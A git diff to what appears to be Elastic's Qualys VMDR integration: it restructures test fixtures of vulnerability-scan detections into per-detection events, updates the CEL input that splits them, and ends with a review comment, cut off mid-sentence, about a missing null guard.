+{"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": 
"11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": [{"NAME": "Sales","TAG_ID": "19427596"},{"TAG_ID": "19429855","NAME": "Linux"}]},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} +{"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": {"TAG_ID": "19429855","NAME": "Linux"}},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": 
"1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} {"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031", "LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822", "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": 
"IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} -{"ASSET_ID":"27703780","DETECTION_LIST":{"DETECTION":{"FIRST_FOUND_DATETIME":"2023-05-30T11:49:24Z","IS_DISABLED":"0","LAST_FOUND_DATETIME":"2023-06-17T12:47:54Z","LAST_PROCESSED_DATETIME":"2023-06-17T13:20:12Z","QID":"70028","RESULTS":"User Name\t(none)\nDomain\t(none)\nAuthentication Scheme\tNULL session\nSecurity\tUser-based\nSMBv1 Signing\tDisabled\nDiscovery Method\tUnable to log in using credentials provided by user, fallback to NULL session\nCIFS Signing\tdefault","SEVERITY":"1","TIMES_FOUND":"38","TYPE":"Info"}},"DNS":"win-d24ck5nn676.ldap.local","DNS_DATA":{"DOMAIN":"ldap.local","FQDN":"win-d24ck5nn676.ldap.local","HOSTNAME":"win-d24ck5nn676"},"ID":"11701931","IP":"10.50.2.122","LAST_PC_SCANNED_DATE":"2023-06-18T04:00:17Z","LAST_SCAN_DATETIME":"2023-06-17T13:20:12Z","LAST_VM_SCANNED_DATE":"2023-06-17T12:47:54Z","LAST_VM_SCANNED_DURATION":"1806","NETBIOS":"WIN-D24CK5NN676","OS":"Windows 2016","TAGS":{"TAG":{"NAME":"Windows","TAG_ID":"19429857"}},"TRACKING_METHOD":"IP"} -{"NETBIOS": "EXCHB10","NETWORK_ID": 0,"EC2_INSTANCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_RESOURCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_SERVICE": "EC2","CLOUD_PROVIDER": "AWS","QG_HOSTID": "44e2cf13-xxxx-48b9-xxxx-de489547754d","METADATA": {"EC2": {"ATTRIBUTE": {"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}},"GOOGLE": {"ATTRIBUTE": {"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}},"AZURE": {"ATTRIBUTE": {"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}}},"CLOUD_PROVIDER_TAGS": {"CLOUD_TAG": {"NAME": 
"Name","VALUE": "allocator-dnt-frozen-i3en-2xl-v1-a","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z"}}, "IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": [{"NAME": "Sales","TAG_ID": "19427596"},{"TAG_ID": "19429855","NAME": "Linux"}]},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"DETECTION": [{"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}]}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} 
+{"ASSET_ID":"27703780","DETECTION_LIST":{"FIRST_FOUND_DATETIME":"2023-05-30T11:49:24Z","IS_DISABLED":"0","LAST_FOUND_DATETIME":"2023-06-17T12:47:54Z","LAST_PROCESSED_DATETIME":"2023-06-17T13:20:12Z","QID":"70028","RESULTS":"User Name\t(none)\nDomain\t(none)\nAuthentication Scheme\tNULL session\nSecurity\tUser-based\nSMBv1 Signing\tDisabled\nDiscovery Method\tUnable to log in using credentials provided by user, fallback to NULL session\nCIFS Signing\tdefault","SEVERITY":"1","TIMES_FOUND":"38","TYPE":"Info"},"DNS":"win-d24ck5nn676.ldap.local","DNS_DATA":{"DOMAIN":"ldap.local","FQDN":"win-d24ck5nn676.ldap.local","HOSTNAME":"win-d24ck5nn676"},"ID":"11701931","IP":"10.50.2.122","LAST_PC_SCANNED_DATE":"2023-06-18T04:00:17Z","LAST_SCAN_DATETIME":"2023-06-17T13:20:12Z","LAST_VM_SCANNED_DATE":"2023-06-17T12:47:54Z","LAST_VM_SCANNED_DURATION":"1806","NETBIOS":"WIN-D24CK5NN676","OS":"Windows 2016","TAGS":{"TAG":{"NAME":"Windows","TAG_ID":"19429857"}},"TRACKING_METHOD":"IP"} +{"NETBIOS": "EXCHB10","NETWORK_ID": 0,"EC2_INSTANCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_RESOURCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_SERVICE": "EC2","CLOUD_PROVIDER": "AWS","QG_HOSTID": "44e2cf13-xxxx-48b9-xxxx-de489547754d","METADATA": {"EC2": {"ATTRIBUTE": {"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}},"GOOGLE": {"ATTRIBUTE": {"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}},"AZURE": {"ATTRIBUTE": {"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}}},"CLOUD_PROVIDER_TAGS": {"CLOUD_TAG": {"NAME": "Name","VALUE": "allocator-dnt-frozen-i3en-2xl-v1-a","LAST_SUCCESS_DATE": 
"2023-06-22T12:44:21Z"}}, "IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": [{"NAME": "Sales","TAG_ID": "19427596"},{"TAG_ID": "19429855","NAME": "Linux"}]},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} 
diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log-expected.json b/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log-expected.json
index af39fe6e98f..d2f51d936c7 100644
--- a/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log-expected.json
+++ b/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log-expected.json
@@ -75,61 +75,6 @@ "scanned_duration": 1822 } }, - "list": [ - { - "affect": { - "exploitable_config": "config1", - "running": { - "kernel": "kernel1", - "service": "service1" - } - }, - "asset_cve": "cve3", - "first": { - "found_datetime": "2023-05-30T07:46:15.000Z", - "reopened_datetime": "2023-05-22T02:09:49.000Z" - }, - "fqdn": "exchb10.exchb10.local", - "instance": "instance1", - "is_disabled": true, - "is_ignored": false, - "last": { - "fixed_datetime": "2023-05-22T02:09:49.000Z", - "found_datetime": "2023-05-30T07:46:15.000Z", - "processed_datetime": "2023-05-30T07:48:14.000Z", - "reopened_datetime": "2023-05-22T02:09:49.000Z", - "test_datetime": "2023-05-30T07:46:15.000Z", - "update_datetime": "2023-05-30T07:48:14.000Z" - }, - "port": 443, - "protocol": "tcp", - "qds": { - "severity": "MEDIUM", - "text": "50" - }, - "qds_factors": [ - { - "name": "RTI", - "text": "Easy_Exploit,No_Patch" - }, - { - "name": "CVSS", - "text": "5.0" - } - ], - "qid": "11827", - "results": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.", - "service": "service1", - "severity": 2, - "ssl": "0", - "status": "New", - "times": { - "found": 1, - "reopened": 2 - }, - "type": "Confirmed" - } - ], "metadata": { "azure": { "attribute": [ 
@@ -199,7 +144,60 @@ "name": "Linux" } ], - "tracking_method": "IP" + "tracking_method": "IP", + "vulnerability": { + "affect": { + "exploitable_config": "config1", + "running": { + "kernel": "kernel1", + "service": "service1" + } + }, + "asset_cve": "cve3", + "first": { + "found_datetime": "2023-05-30T07:46:15.000Z", + "reopened_datetime": "2023-05-22T02:09:49.000Z" + }, + "fqdn": "exchb10.exchb10.local", + "instance": "instance1", + "is_disabled": true, + "is_ignored": false, + "last": { + "fixed_datetime": "2023-05-22T02:09:49.000Z", + "found_datetime": "2023-05-30T07:46:15.000Z", + "processed_datetime": "2023-05-30T07:48:14.000Z", + "reopened_datetime": "2023-05-22T02:09:49.000Z", + "test_datetime": "2023-05-30T07:46:15.000Z", + "update_datetime": "2023-05-30T07:48:14.000Z" + }, + "port": 443, + "protocol": "tcp", + "qds": { + "severity": "MEDIUM", + "text": "50" + }, + "qds_factors": [ + { + "name": "RTI", + "text": "Easy_Exploit,No_Patch" + }, + { + "name": "CVSS", + "text": "5.0" + } + ], + "qid": "11827", + "results": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.", + "service": "service1", + "severity": 2, + "ssl": "0", + "status": "New", + "times": { + "found": 1, + "reopened": 2 + }, + "type": "Confirmed" + } } }, "related": { 
@@ -268,45 +266,6 @@ "scanned_duration": 1822 } }, - "list": [ - { - "first": { - "found_datetime": "2023-05-30T07:46:15.000Z" - }, - "is_ignored": false, - "last": { - "found_datetime": "2023-05-30T07:46:15.000Z", - "processed_datetime": "2023-05-30T07:48:14.000Z", - "test_datetime": "2023-05-30T07:46:15.000Z", - "update_datetime": "2023-05-30T07:48:14.000Z" - }, - "port": 443, - "protocol": "tcp", - "qds": { - "severity": "MEDIUM", - "text": "50" - }, - "qds_factors": [ - { - "name": "RTI", - "text": "Easy_Exploit,No_Patch" - }, - { - "name": "CVSS", - "text": "5.0" - } - ], - "qid": "11827", - "results": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.", - "severity": 2, - "ssl": "0", - "status": "New", - "times": { - "found": 1 - }, - "type": "Confirmed" - } - ], "netbios": "EXCHB10", "os": { "value": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607" 
@@ -315,7 +274,44 @@ "id": "19429855", "name": "Linux" }, - "tracking_method": "IP" + "tracking_method": "IP", + "vulnerability": { + "first": { + "found_datetime": "2023-05-30T07:46:15.000Z" + }, + "is_ignored": false, + "last": { + "found_datetime": "2023-05-30T07:46:15.000Z", + "processed_datetime": "2023-05-30T07:48:14.000Z", + "test_datetime": "2023-05-30T07:46:15.000Z", + "update_datetime": "2023-05-30T07:48:14.000Z" + }, + "port": 443, + "protocol": "tcp", + "qds": { + "severity": "MEDIUM", + "text": "50" + }, + "qds_factors": [ + { + "name": "RTI", + "text": "Easy_Exploit,No_Patch" + }, + { + "name": "CVSS", + "text": "5.0" + } + ], + "qid": "11827", + "results": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.", + "severity": 2, + "ssl": "0", + "status": "New", + "times": { + "found": 1 + }, + "type": "Confirmed" + } } }, "related": { @@ -381,7 +377,22 @@ "scanned_duration": 1822 } }, - "list": { + "netbios": "EXCHB10", + "os": { + "value": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607" + }, + "tags": [ + { + "id": "19427596", + "name": "Sales" + }, + { + "id": "19429855", + "name": "Linux" + } + ], + "tracking_method": "IP", + "vulnerability": { "first": { "found_datetime": "2023-05-30T07:46:15.000Z" }, 
@@ -418,22 +429,7 @@ "found": 1 }, "type": "Confirmed" - }, - "netbios": "EXCHB10", - "os": { - "value": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607" - }, - "tags": [ - { - "id": "19427596", - "name": "Sales" - }, - { - "id": "19429855", - "name": "Linux" - } - ], - "tracking_method": "IP" + } } }, "related": { @@ -499,7 +495,16 @@ "scanned_duration": 1822 } }, - "list": { + "netbios": "EXCHB10", + "os": { + "value": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607" + }, + "tags": { + "id": "19429855", + "name": "Linux" + }, + "tracking_method": "IP", + "vulnerability": { "first": { "found_datetime": "2023-05-30T07:46:15.000Z" }, @@ -536,16 +541,7 @@ "found": 1 }, "type": "Confirmed" - }, - "netbios": "EXCHB10", - "os": { - "value": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607" - }, - "tags": { - "id": "19429855", - "name": "Linux" - }, - "tracking_method": "IP" + } } }, "related": { @@ -677,7 +673,16 @@ "scanned_duration": 1806 } }, - "list": { + "netbios": "WIN-D24CK5NN676", + "os": { + "value": "Windows 2016" + }, + "tags": { + "id": "19429857", + "name": "Windows" + }, + "tracking_method": "IP", + "vulnerability": { "first": { "found_datetime": "2023-05-30T11:49:24.000Z" }, @@ -693,16 +698,7 @@ "found": 38 }, "type": "Info" - }, - "netbios": "WIN-D24CK5NN676", - "os": { - "value": "Windows 2016" - }, - "tags": { - "id": "19429857", - "name": "Windows" - }, - "tracking_method": "IP" + } } }, "related": { 
@@ -792,46 +788,6 @@ "scanned_duration": 1822 } }, - "list": [ - { - "first": { - "found_datetime": "2023-05-30T07:46:15.000Z" - }, - "is_disabled": true, - "is_ignored": false, - "last": { - "found_datetime": "2023-05-30T07:46:15.000Z", - "processed_datetime": "2023-05-30T07:48:14.000Z", - "test_datetime": "2023-05-30T07:46:15.000Z", - "update_datetime": "2023-05-30T07:48:14.000Z" - }, - "port": 443, - "protocol": "tcp", - "qds": { - "severity": "MEDIUM", - "text": "50" - }, - "qds_factors": [ - { - "name": "RTI", - "text": "Easy_Exploit,No_Patch" - }, - { - "name": "CVSS", - "text": "5.0" - } - ], - "qid": "11827", - "results": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.", - "severity": 2, - "ssl": "0", - "status": "New", - "times": { - "found": 1 - }, - "type": "Confirmed" - } - ], "metadata": { "azure": { "attribute": { 
@@ -892,7 +848,45 @@
"name": "Linux"
}
],
- "tracking_method": "IP"
+ "tracking_method": "IP",
+ "vulnerability": {
+ "first": {
+ "found_datetime": "2023-05-30T07:46:15.000Z"
+ },
+ "is_disabled": true,
+ "is_ignored": false,
+ "last": {
+ "found_datetime": "2023-05-30T07:46:15.000Z",
+ "processed_datetime": "2023-05-30T07:48:14.000Z",
+ "test_datetime": "2023-05-30T07:46:15.000Z",
+ "update_datetime": "2023-05-30T07:48:14.000Z"
+ },
+ "port": 443,
+ "protocol": "tcp",
+ "qds": {
+ "severity": "MEDIUM",
+ "text": "50"
+ },
+ "qds_factors": [
+ {
+ "name": "RTI",
+ "text": "Easy_Exploit,No_Patch"
+ },
+ {
+ "name": "CVSS",
+ "text": "5.0"
+ }
+ ],
+ "qid": "11827",
+ "results": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.",
+ "severity": 2,
+ "ssl": "0",
+ "status": "New",
+ "times": {
+ "found": 1
+ },
+ "type": "Confirmed"
+ }
}
},
"related": {
diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/system/test-default-config.yml b/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/system/test-default-config.yml
index 2e80cc9d5a0..f24e7929eba 100644
--- a/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/system/test-default-config.yml
+++ b/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/system/test-default-config.yml
@@ -8,4 +8,4 @@ data_stream:
url: http://{{Hostname}}:{{Port}}
preserve_duplicate_custom_fields: true
assert:
- hit_count: 1
+ hit_count: 2
diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/agent/stream/input.yml.hbs b/packages/qualys_vmdr/data_stream/asset_host_detection/agent/stream/input.yml.hbs index b93606f3126..63f16d44cc0 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/agent/stream/input.yml.hbs +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/agent/stream/input.yml.hbs @@ -36,9 +36,11 @@ program: | "Authorization": ["Basic "+string(base64(state.user+":"+state.password))], } }).do_request().as(resp, bytes(resp.Body).decode_xml('qualys_api_2_0').as(body, { - "events": body.doc.HOST_LIST_VM_DETECTION_OUTPUT.RESPONSE.HOST_LIST.HOST.map(e, { - "message": e.encode_json(), - }), + "events": body.doc.HOST_LIST_VM_DETECTION_OUTPUT.RESPONSE.HOST_LIST.HOST.map(h, + h.DETECTION_LIST.DETECTION.map(v, { + "message": h.with({"DETECTION_LIST": v}).encode_json(), + }) + ).flatten(), "url": ( has(body.doc.HOST_LIST_VM_DETECTION_OUTPUT.RESPONSE.WARNING) && has(body.doc.HOST_LIST_VM_DETECTION_OUTPUT.RESPONSE.WARNING.URL) ? diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/elasticsearch/ingest_pipeline/default.yml b/packages/qualys_vmdr/data_stream/asset_host_detection/elasticsearch/ingest_pipeline/default.yml index aca46365244..b17dad52824 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/elasticsearch/ingest_pipeline/default.yml +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/elasticsearch/ingest_pipeline/default.yml 
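Review bot: The new comprehension `h.DETECTION_LIST.DETECTION.map(v, …)` in the input.yml.hbs hunk dereferences DETECTION_LIST and DETECTION unconditionally, so a HOST entry that carries no DETECTION_LIST (or one whose DETECTION is absent) would make the whole program evaluation fail instead of that host being skipped, and the old `e.encode_json()` form had no such dependency. It is also not visible here whether decode_xml('qualys_api_2_0') always yields a list for DETECTION; the removed pipeline guard `instanceof List` and the removed sample line with a single DETECTION object suggest a single map was at least possible before, and a CEL `map` over a map would iterate its keys rather than the detection. A guard such as `has(h.DETECTION_LIST) && has(h.DETECTION_LIST.DETECTION) ? h.DETECTION_LIST.DETECTION.map(v, {"message": h.with({"DETECTION_LIST": v}).encode_json()}) : []` keeps `.flatten()` 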